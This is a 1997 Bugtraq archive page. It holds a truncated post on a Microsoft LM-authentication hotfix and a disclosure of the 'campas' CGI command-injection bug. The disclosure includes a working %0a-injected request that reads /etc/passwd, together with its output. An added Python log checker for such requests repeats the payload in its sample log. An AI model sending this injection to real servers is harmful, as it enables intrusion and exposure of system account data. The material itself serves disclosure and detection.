Bugtraq mailing list archives

new post SP3 hotfix: lm-fix


From: alex () DAN LV (Alex Libenson)
Date: Sat, 12 Jul 1997 21:16:01 +0300


ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/NT40/hotfixes-postSP3/lm-fix

DOCUMENT:Q147706
TITLE:How to Disable LM Authentication on Windows NT
PRODUCT:Microsoft Windows NT, Windows 95, Windows for Workgroups 3.11 and LAN Manager 2.2c
PROD/VER:2.2 3.11 4.0 95
OPER/SYS:WINDOWS
KEYWORD:kberrmsg kbfile ntsecurity NTSrvWkst ntstop

--------------------------------------------------------------------------
The information in this article applies to:

 - Microsoft Windows NT Workstation version 4.0
 - Microsoft Windows NT Server version 4.0
 - Microsoft LAN Manager version 2.2c
 - Microsoft Windows for Workgroups version 3.11
 - Microsoft Windows 95
--------------------------------------------------------------------------

SUMMARY
=======

Windows NT supports the following two types of challenge/response
authentication:

 - LanManager (LM) challenge/response
 - Windows NT challenge/response

To allow access to servers that only support LM authentication, Windows NT
clients currently send both authentication types. Microsoft developed a
patch that supports a new registry

From owner-bugtraq () NETSPACE ORG  Wed Jul 16 06:02:05 1997
Approved-By: aleph1 () UNDERGROUND ORG
Message-ID: <Pine.LNX.3.96.970715180941.1257A-100000 () castor javeriana edu co>
Date:   Tue, 15 Jul 1997 18:24:31 -0500
Reply-To: Francisco Torres <ftorres () CASTOR JAVERIANA EDU CO>
Sender: Bugtraq List <BUGTRAQ () NETSPACE ORG>
From: Francisco Torres <ftorres () CASTOR JAVERIANA EDU CO>
Subject:      Bug CGI campas
To: BUGTRAQ () NETSPACE ORG
In-Reply-To:  <Pine.LNX.3.96.970715183741.21934G-100000 () typhaon ucs uwa edu au>

CAMPAS SECURITY BUG
-------------------
        ET Lownoise Colombia 1997

CGI:    campas
        #!/bin/sh
        #pragma ident "@(#)campas.sh    1.2 95/05/24 NCSA"

Impact: Execute commands

Exploit:
telnet www.xxxx.net 80
Trying 200.xx.xx.xx...
Connected to venus.xxxx.net
Escape character is '^]'.
GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a
<PRE>
root:x:0:1:Super-User:/export/home/root:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
smtp:x:0:0:Mail Daemon User:/:/bin/false
.... continue :P

Solution: 1-If you don't use it, erase it!
          2-Don't use it again.. (go to point 1)

Well another line to put in vito.ini.

ET LOwnoise 1997 Colombia
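
Added example, not part of the original post or of the campas script: a log check for the request shown above, where %0a in the query string decodes to a newline that the shell CGI treats as a command separator. It generalizes from campas to any path under /cgi-bin/ and to any control character; the log format (NCSA Common Log Format), the sample lines and the example.sh name are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request field of an NCSA Common Log Format entry: "METHOD target [HTTP/x.y]".
# The protocol part is optional because the request in the post omits it.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?"')

# Control characters other than TAB. LF (%0a) and CR (%0d) are the ones that
# end a command line when a shell script expands the query string unquoted.
CONTROL_RE = re.compile(r'[\x00-\x08\x0a-\x1f\x7f]')


def suspicious_cgi_requests(log_lines, prefix="/cgi-bin/"):
    """Return (line_number, path, decoded_query) for CGI requests whose
    percent-decoded query string contains a control character."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parsable request line
        path, _, query = match.group("target").partition("?")
        if not unquote(path).startswith(prefix):
            continue  # only CGI programs are of interest here
        decoded = unquote(query)  # what the web server hands to the script
        if CONTROL_RE.search(decoded):
            hits.append((number, path, decoded))
    return hits


# Constructed sample log (documentation addresses, hypothetical example.sh).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Jul/1997:18:20:01 -0500] "GET /index.html HTTP/1.0" 200 1043',
    '192.0.2.44 - - [15/Jul/1997:18:21:17 -0500] "GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a" 200 812',
    '192.0.2.10 - - [15/Jul/1997:18:22:40 -0500] "GET /cgi-bin/search?q=solaris+patches HTTP/1.0" 200 2290',
    '192.0.2.10 - - [15/Jul/1997:18:23:02 -0500] "GET /cgi-bin/campas?info HTTP/1.0" 200 377',
    '192.0.2.51 - - [15/Jul/1997:18:23:05 -0500] "GET /cgi-bin/example.sh?a%0Ab HTTP/1.0" 200 97',
]

if __name__ == "__main__":
    for number, path, query in suspicious_cgi_requests(SAMPLE_LOG):
        print(f"line {number}: {path} query={query!r}")
```

A hit on a host that still has campas installed is a reason to treat /etc/passwd and anything else readable by the web server account as disclosed, and to remove the script as the post advises.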


